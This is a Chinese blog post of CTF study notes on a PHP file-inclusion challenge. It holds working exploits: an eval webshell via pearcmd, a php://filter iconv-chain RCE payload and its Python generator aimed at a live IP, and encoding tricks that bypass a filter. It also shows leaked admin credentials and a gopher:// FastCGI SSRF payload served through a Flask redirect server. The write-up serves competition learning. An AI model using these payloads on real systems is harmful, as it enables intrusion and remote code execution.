CTF-WEB: 目录穿越与伪协议 fastcgi gopher://协议利用 [第一届国城杯 signal] 赛后学习笔记

已于 2025-01-29 15:01:25 修改
阅读量595 收藏
点赞数 2
文章标签: 网络安全
于 2024-12-08 13:39:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59166557/article/details/144325028
版权

step 1

目录扫描得到 .index.php.swp

最近我朋友让我给他注册个账号,还想要在他的专属页面实现查看文件的功能。好吧,那就给他创个guest:MyF3iend,我是不可能给他我的admin账户的

step2

来到里面能看见

/guest.php?path=/tmp/hello.php

尝试

/guest.php?path=./guest.php

服务器直接崩溃了,当时觉得很奇怪,但是没注意,看了其他师傅的wp发现这是include()

尝试

/guest.php?+config-create+/&path=/usr/local/lib/php/pearcmd.php&/<?=eval($_GET['cmd']);?>+/tmp/test.php

失败

ERROR: either use the CLI php executable, or set register_argc_argv=On in php.ini

继续

/guest.php?path=/var/lib/php5/sess_abb1ad4v4r5f8ls8dough3foan

被过滤了,继续

/guest.php?path=/proc/self/environ

被过滤了,继续

POST /guest.php?path=php://input%00 HTTP/1.1
Host: ip
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=abb1ad4v4r5f8ls8dough3foan
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

<?php system('sleep(10)'); ?>

无效,继续

/guest.php?path=http://xxx.oastify.com/

无法出网,继续

# vulnerable file: index.php
# vulnerable parameter: file
# executed command: id
# executed PHP code: <?=`$_GET[0]`;;?>
curl "127.0.0.1:8000/index.php?0=id&file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd"

还是不行,根据

Server: nginx/1.14.2

百度根目录

/usr/share/nginx/html

多次尝试不同过滤器,失败

/guest.php?path=php://filter//resource=/usr/share/nginx/html/guest.php

这个又崩服务器了

尝试绕过限制无果再看眼WP

/guest.php?path=php://filter/conv%2565rt.bas%256564-encode/resource=/var/www/html/guest.php

(这是预期解吗?看着不太像)

<?php
session_start();
error_reporting(0);

if ($_SESSION['logged_in'] !== true || $_SESSION['username'] !== 'guest' ) {
    $_SESSION['error'] = 'Please fill in the username and password';
    header('Location: index.php');
    exit();
}

if (!isset($_GET['path'])) {
    header("Location: /guest.php?path=/tmp/hello.php");
    exit;
}

$path = $_GET['path'];
if (preg_match('/(\.\.\/|php:\/\/tmp|string|iconv|base|rot|IS|data|text|plain|decode|SHIFT|BIT|CP|PS|TF|NA|SE|SF|MS|UCS|CS|UTF|quoted|log|sess|zlib|bzip2|convert|JP|VE|KR|BM|ISO|proc|\_)/i', $path)) {
    echo "Don't do this";
}else{
    include($path);
}
?>

我们再读一下 index

/guest.php?path=php://filter/conv%2565rt.bas%256564-encode/resource=/var/www/html/guest.php

<?php
// 启动一个新的会话,允许在多个页面之间存储和访问会话变量
session_start();
?>

<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8"> <!-- 设置字符编码为 UTF-8,以支持中文字符 -->
    <meta name="viewport" content="width=device-width, initial-scale=1.0"> <!-- 设置视口以支持响应式设计 -->
    <title>登录</title> <!-- 设置页面标题为“登录” -->
    <style>
        /* 页面基本样式设置 */
        body {
            margin: 0; /* 移除默认边距 */
            display: flex; /* 使用 Flexbox 布局使内容居中 */
            justify-content: center; /* 水平居中对齐 */
            align-items: center; /* 垂直居中对齐 */
            height: 100vh; /* 高度占满整个视口 */
            background: linear-gradient(135deg, #6dd5ed, #2193b0); /* 设置渐变背景 */
            font-family: Arial, sans-serif; /* 设置字体 */
            overflow: hidden; /* 隐藏溢出内容 */
            position: relative; /* 相对定位为后续绝对定位元素提供参考 */
        }

        /* 创建浮动效果的圆形元素 */
        body::before, body::after {
            content: ""; /* 生成内容为空的伪元素 */
            position: absolute; /* 绝对定位 */
            width: 400px; /* 设置宽度 */
            height: 400px; /* 设置高度 */
            border-radius: 50%; /* 圆形边框 */
            background: rgba(255, 255, 255, 0.1); /* 半透明背景 */
            animation: float 6s ease-in-out infinite; /* 设置浮动动画 */
            z-index: 0; /* 确保其位于背景层 */
        }

        /* 定义浮动动画的起始和结束位置 */
        body::before {
            top: -100px; /* 位置偏移 */
            right: -150px; /* 位置偏移 */
        }
        /* 定义另一个浮动元素的位置 */
        body::after {
            bottom: -150px; /* 位置偏移 */
            left: -200px; /* 位置偏移 */
        }
        
        /* 定义浮动动画效果 */
        @keyframes float {
            0% {
                transform: translate(0, 0); /* 动画起始状态 */
            }
            50% {
                transform: translate(-20px, -20px); /* 动画中间状态 */
            }
            100% {
                transform: translate(0, 0); /* 动画结束状态 */
            }
        }

        /* 登录框样式 */
        .login-container {
            background: rgba(255, 255, 255, 0.9); /* 半透明背景 */
            padding: 20px; /* 内边距 */
            border-radius: 10px; /* 圆角边框 */
            box-shadow: 0 4px 20px rgba(0, 0, 0, 0.2); /* 阴影效果 */
            z-index: 1; /* 确保其位于上层 */
        }

        /* 输入框和按钮样式 */
        input[type="text"], input[type="password"] {
            width: 100%; /* 输入框宽度占满父容器 */
            padding: 10px; /* 内边距 */
            margin: 10px 0; /* 上下外边距 */
            border: 1px solid #ccc; /* 边框颜色 */
            border-radius: 5px; /* 圆角边框 */
        }

        /* 按钮样式 */
        input[type="submit"] {
            background-color: #2193b0; /* 按钮背景色 */
            color: white; /* 字体颜色 */
            border: none; /* 无边框 */
            padding: 10px; /* 内边距 */
            border-radius: 5px; /* 圆角边框 */
            cursor: pointer; /* 鼠标悬停时显示指针样式 */
            transition: background-color 0.3s; /* 背景色变化的过渡效果 */
        }

        /* 鼠标悬停时按钮效果 */
        input[type="submit"]:hover {
            background-color: #6dd5ed; /*

之前有一段话

最近我朋友让我给他注册个账号,还想要在他的专属页面实现查看文件的功能。好吧,那就给他创个guest:MyF3iend,我是不可能给他我的admin账户的

我们来试试有没有admin的专属页面,还真有

/guest.php?path=php://filter/conv%2565rt.bas%256564-encode/resource=/var/www/html/admin.php

<?php
// 开启Session
session_start();

// 关闭错误报告
error_reporting(0);

// 检查用户是否已经登录且用户名为'admin'
if ($_SESSION['logged_in'] !== true || $_SESSION['username'] !== 'admin') {
    // 如果未登录或用户名不是'admin',设置错误信息并重定向到登录页面
    $_SESSION['error'] = 'Please fill in the username and password';
    header("Location: index.php");
    exit();
}

// 获取POST请求中的URL
$url = $_POST['url'];
$error_message = '';  // 初始化错误信息变量
$page_content = '';   // 初始化页面内容变量

// 检查是否有URL提交
if (isset($url)) {
    // 检查URL是否以'https://'开头
    if (!preg_match('/^https:\/\//', $url)) {
        // 如果URL无效,设置错误信息
        $error_message = 'Invalid URL, only https allowed';
    } else {
        // 初始化一个cURL会话
        $ch = curl_init();
        // 设置cURL选项
        curl_setopt($ch, CURLOPT_URL, $url);              // 设置要获取的URL
        curl_setopt($ch, CURLOPT_HEADER, 0);              // 不包括头信息
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);      // 跟随重定向
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);      // 返回结果而不是直接输出
        // 执行cURL会话
        $page_content = curl_exec($ch);
        // 检查cURL执行是否成功
        if ($page_content === false) {
            $error_message = 'Failed to fetch the URL content';  // 设置错误信息
        }
        // 关闭cURL会话
        curl_close($ch);
    }
}
?>
<!DOCTYPE html>
<html lang='en'>
<head>
    <meta charset='UTF-8'>
    <meta name='viewport' content='width=device-width, initial-scale=1.0'>
    <title>Welcome</title>
    <style>
        /* 页面样式 */
        body {
            margin: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background: linear-gradient(135deg, #6dd5ed, #2193b0);
            font-family: Arial, sans-serif;
            overflow: hidden;
            position: relative;
        }

        body::before, body::after {
            content: '';
            position: absolute;
            width: 400px;
            height: 400px;
            border-radius: 50%;
            background: rgba(255, 255, 255, 0.1);
            animation: float 6s ease-in-out infinite;
            z-index: 0;
        }

        body::before {
            top: -100px;
            right: -150px;
        }

        body::after {
            bottom: -150px;
            left: -100px;
        }

        @keyframes float {
            0%, 100% { transform: translateY(0); }
            50% { transform: translateY(20px); }
        }

        .login-container {
            position: relative;
            z-index: 1;
            width: 350px;
            padding: 2rem;
            background-color: #ffffff;
            border-radius: 12px;
            text-align: center;
            box-shadow: 0px 4px 20px rgba(0, 0, 0, 0.2);
            backdrop-filter: blur(10px);
            transition: transform 0.3s ease;
        }

        .login-container:hover {
            transform: translateY(-5px);
        }

        .login-container h2 {
            margin-bottom: 1.5rem;
            color: #333;
            font-weight: bold;
        }

        .login-container input[type='text'] {
            width: 100%;
            padding: 0.75rem;
            margin: 0.5rem 0;
            border: 1px solid #ddd;
            border-radius: 5px;
            box-sizing: border-box;
            font-size: 1rem;
            outline: none;
            transition: border-color 0.3s ease;
        }

        .login-container input[type='text']:focus {
            border-color: #4CAF50;
            box-shadow: 0px 0px 5px rgba(76, 175, 80, 0.5);
        }

        .login-container button {
            width: 100%;
            padding: 0.75rem;
            margin-top: 1rem;
            background-color: #4CAF50;
            color: white;
            border: none;
            border-radius: 5px;
            font-size: 1rem;
            cursor: pointer;
            transition: background-color 0.3s, transform 0.3s;
            position: relative;
            overflow: hidden;
        }

        .login-container button:hover {
            background-color: #45a049;
            transform: translateY(-3px);
        }

        .login-container button:active {
            transform: translateY(1px);
        }

        .login-container p {
            margin-top: 1rem;
            color: #666;
            font-size: 0.9rem;
        }

        .error {
            color: red;
            margin-top: 0.5rem;
            text-align: center;
            font-size: 0.9rem;
        }

        .content {
            margin-top: 1rem;
            padding: 1rem;
            background-color: #f9f9f9;
            border: 1px solid #ddd;
            border-radius: 5px;
            word-wrap: break-word;
            max-height: 200px;
            overflow-y: auto;
        }
    </style>
</head>
<body>

<div class='login-container'>
    <h2>Welcome</h2>
    <p>网页查看,just do it😎</p>
    <form method='post' action=''>
        <input type='text' name='url' placeholder='Enter URL' required>
        <button type='submit'>Submit</button>
        <?php if (!empty($error_message)) : ?>
            <div class='error'><?= htmlspecialchars($error_message) ?></div>
        <?php endif; ?>
    </form>
    <?php if (!empty($page_content)) : ?>
        <div class='content'>
            <?= nl2br(htmlspecialchars($page_content)); ?>
        </div>
    <?php endif; ?>
</div>
</body>
</html>

没啥用,看看有没有login

/guest.php?path=php://filter/conv%2565rt.bas%256564-encode/resource=/var/www/html/%256cogin.php

没有,再回头试试

/guest.php?path=php://filter/conv%2565rt.bas%256564-encode/resource=/%2570roc/%25703elf/environ

投机取巧失败,只能用原wp的复杂方法了

import re

file_to_use = "/etc/passwd"

# <?=`$_GET[0]`;;?>
base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"

conversions = {
    'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
    'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
    'C': 'convert.iconv.UTF8.CSISO2022KR',
    '8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
    '9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
    'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
    's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
    'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
    'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
    'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
    'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
    '0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
    'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
    'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
    'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
    'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
    '7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
    '4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
}


# generate some garbage base64
filters = "convert.iconv.UTF8.CSISO2022KR|"
filters += "convert.base64-encode|"
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
filters += "convert.iconv.UTF8.UTF7|"


for c in base64_payload[::-1]:
        filters += conversions[c] + "|"
        # decode and reencode to get rid of everything that isn't valid base64
        filters += "convert.base64-decode|"
        filters += "convert.base64-encode|"
        # get rid of equal signs
        filters += "convert.iconv.UTF8.UTF7|"

filters += "convert.base64-decode"

final_payload = f"php://filter/{filters}/resource={file_to_use}"

not_allow = "string|iconv|base|rot|IS|data|text|plain|decode|SHIFT|BIT|CP|PS|TF|NA|SE|SF|MS|UCS|CS|UTF|quoted|log|sess|zlib|bzip2|convert|JP|VE|KR|BM|ISO|proc|_|ve|se"
not_allow = not_allow.split('|')
for i in not_allow:
        final_payload = final_payload.replace(i, ('%25'+(hex(ord(i[0]))[2:])+i[1:]))

url = 'http://125.70.243.22:31933/guest.php'
v = 'path'
cmd = 'ls'
final_payload = f'{url}?0={cmd}&{v}={final_payload}'

with open('payload', 'w') as f:
    f.write(final_payload)

"""
r = requests.get(url, params={
    "0": command,
    "action": "include",
    "file": final_payload
})

print(r.text)
"""

继续按预期解复现一遍

// 获取POST请求中的URL
$url = $_POST['url'];
$error_message = '';  // 初始化错误信息变量
$page_content = '';   // 初始化页面内容变量

// 检查是否有URL提交
if (isset($url)) {
    // 检查URL是否以'https://'开头
    if (!preg_match('/^https:\/\//', $url)) {
        // 如果URL无效,设置错误信息
        $error_message = 'Invalid URL, only https allowed';
    } else {
        // 初始化一个cURL会话
        $ch = curl_init();
        // 设置cURL选项
        curl_setopt($ch, CURLOPT_URL, $url);              // 设置要获取的URL
        curl_setopt($ch, CURLOPT_HEADER, 0);              // 不包括头信息
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);      // 跟随重定向
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);      // 返回结果而不是直接输出
        // 执行cURL会话
        $page_content = curl_exec($ch);
        // 检查cURL执行是否成功
        if ($page_content === false) {
            $error_message = 'Failed to fetch the URL content';  // 设置错误信息
        }
        // 关闭cURL会话
        curl_close($ch);
    }
}

在登录界面查看

<form action="StoredAccounts.php" method="POST">
        <label for="username">Username:</label>
        <input type="text" id="username" name="username" required=""><br><br>
        <label for="password">Password:</label>
        <input type="password" id="password" name="password" required=""><br><br>
        <input type="submit" value="Login">
    </form>

发现登录信息被发送到了StoredAccounts.php,我们读取获得admin密码

/guest.php?path=php://filter/conv%2565rt.bas%256564-encode/resource=/var/www/html/StoredAccounts.php

<?php
session_start();

$users = [
    'admin' => 'FetxRuFebAdm4nHace',
    'guest' => 'MyF3iend'
];

if (isset($_POST['username']) && isset($_POST['password'])) {
    $username = $_POST['username'];
    $password = $_POST['password'];

    if (isset($users[$username]) && $users[$username] === $password) {
        $_SESSION['logged_in'] = true;
        $_SESSION['username'] = $username;

        if ($username === 'admin') {
            header('Location: admin.php');
        } else {
            header('Location: guest.php');
        }
        exit();
    } else {
        $_SESSION['error'] = 'Invalid username or password';
        header('Location: index.php');
        exit();
    }
} else {
    $_SESSION['error'] = 'Please fill in the username and password';
    header('Location: index.php');
    exit();
}

php的:curl_exec 接受 支持gopher://协议,我们直接抄一段poc

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/usr/share/php/PEAR.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3A%04%00%3C%3Fphp%20system%28%27whoami%27%29%3F%3E%00%00%00%00

虽然此处做出了限制

if (!preg_match('/^https:\/\//', $url)) {

但是允许重定向

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

但是我们可以搭建一个跳板服务器,并用花生壳内网穿透在公网部署服务器

from flask import Flask, redirect  
  
app = Flask(__name__)  
  
@app.route('/')  
def indexRedirect():  
    redirectUrl = 'https://your.com/ok'  
    return redirect(redirectUrl)  
  
@app.route('/ok')  
def ok():  
    return "<h1>Welcome to the OK page!</h1><p>This is the content of the OK page.</p>"  
  
if __name__ == '__main__':  
    app.run('0.0.0.0', port=11111, debug=True)

原wp会崩服务器,我们手动改下poc

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20=%20On%0Adisable_functions%20=%20%0Aauto_prepend_file%20=%20php://input%0F%17SCRIPT_FILENAME/var/www/html/admin.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00:%04%00%3C?php%20system('whoami')?%3E%00%00%00%00

还是崩服务器,用工具吧,不手写了

Antabuse-123/Gopherus: This tool generates gopher link for exploiting SSRF and gaining RCE in various servers

-----------Made-by-SpyD3r-----------
❯ python gopherus3.py --exploit fastcgi

      ________              .__                                ________  
     /  _____/  ____ ______ |  |__   ___________ __ __  ______ \_____  \                                                                                    
    /   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/   _(__  <                                                                                    
    \    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \   /       \                                                                                   
     \______  /\____/|   __/|___|  /\___  >__|  |____//____  > /______  /                                                                                   
            \/       |__|        \/     \/                 \/         \/                                                                                    
                                                                                                                                                            
                author: $_SpyD3r_$                                                                                                                          
                                                                                                                                                            
Give one file name which should be surely present in the server (prefer .php file)
if you don't know press ENTER we have default one:  /var/www/html/admin.php                                                                                 
Terminal command to run:  whoami

Your gopher link is ready to do SSRF:                                                                                                                       
                                                                                                                                                            
gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/admin.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3A%04%00%3C%3Fphp%20system%28%27whoami%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

-----------Made-by-SpyD3r-----------

end 24.12.15 A5rZ

from flask import Flask, redirect  
  
app = Flask(__name__)  
  
@app.route('/')  
def indexRedirect():  
    redirectUrl = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/admin.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3A%04%00%3C%3Fphp%20system%28%27whoami%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00'  
    return redirect(redirectUrl)  
  
if __name__ == '__main__':  
    app.run('0.0.0.0', port=11111, debug=True)
A5rZ
关注
文件操作安全之-目录穿越原理篇
村中少年的专栏
10-12 2659
目录穿越的定义,目录穿越的漏洞原理,目录穿越漏洞的具体案例,例如Apache http服务器CVE-2021-41773和CVE-2021-42013目录穿越漏洞,以及目录穿越漏洞潜在的危害阐述目录穿越漏洞中的安全问题。
目录穿越及其绕过
web1的博客
09-01 7730
1、目录遍历读取任意文件(相对路径) ?filename=37.jpg /var/www/images/37.jpg …/…/…/etc/passwd 2、绝对路径 3、过滤 …/ ,重写即可 修改filename参数,赋予其值:…//////etc/passwd …//////etc/passwd …/…/…/etc/passwd 4、使用各种url编码(例如…%c0%af或…%252f)来绕过输入过滤器 修改filename参数,赋予它值…%252f…%252f…%252fetc/passw
CTF-web 第八部分 常见加密文件包含 伪协议
iamsongyu的博客
11-05 2405
(1)加密解密等 我们在做题的时候,经常会遇到一些奇怪的加密解密的字符串,这就需要我们能够识别一些比较常用的。        1.base64         这是一个常用的编码,而且原理也十分简单,非常容易得到原内容。 三字节变为四字节 前面补两个0。  所谓Base64,就是说选出64个字符----小写字母a-z、大写字母A-Z、数字0-9、符号"+"、"/"(再加上作为垫字的"=",实...
目录穿越/遍历漏洞及对其防御方法的绕过
2301_77004573的博客
04-30 7425
目录穿越目录遍历)是一个Web安全漏洞,攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。这可能包括应用程序代码和数据,后端系统的登录信息以及敏感的操作系统文件。目录穿越不仅可以访问服务器中的任何目录,还可以访问服务器中任何文件的内容。例如,攻击者通过浏览器访问…/…/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd(此处较多…/),就可以读取Linux服务器根目录下的etc目录下的passwd文件的内容。
CTF-WEB:PHP伪协议用法总结
最新发布
weixin_59166557的博客
11-09 2737
是 PHP 中的一个虚拟协议(或称为流包装器),用于访问 PHP 内部流资源。它是 PHP 提供的内置流协议之一,允许你通过流(stream)方式访问 PHP 内部的数据流、文件或其他资源。协议不同, 并不直接映射到文件系统,而是用于处理 PHP 特有的资源,如输入输出流、临时文件、PHP 自身的内存流等。 协议是 PHP 流包装器的一部分,允许在 PHP 脚本中灵活地处理不同类型的资源。 有多个子协议,它们提供不同的功能,常见的子协议有 、、 等。 是一个只读流,用于读取原始的 POST 数据。
CTFHUB--SSRF(中)--FastCGI协议\Redis协议 以及gopherus工具攻击
qq_75120258的博客
03-29 2671
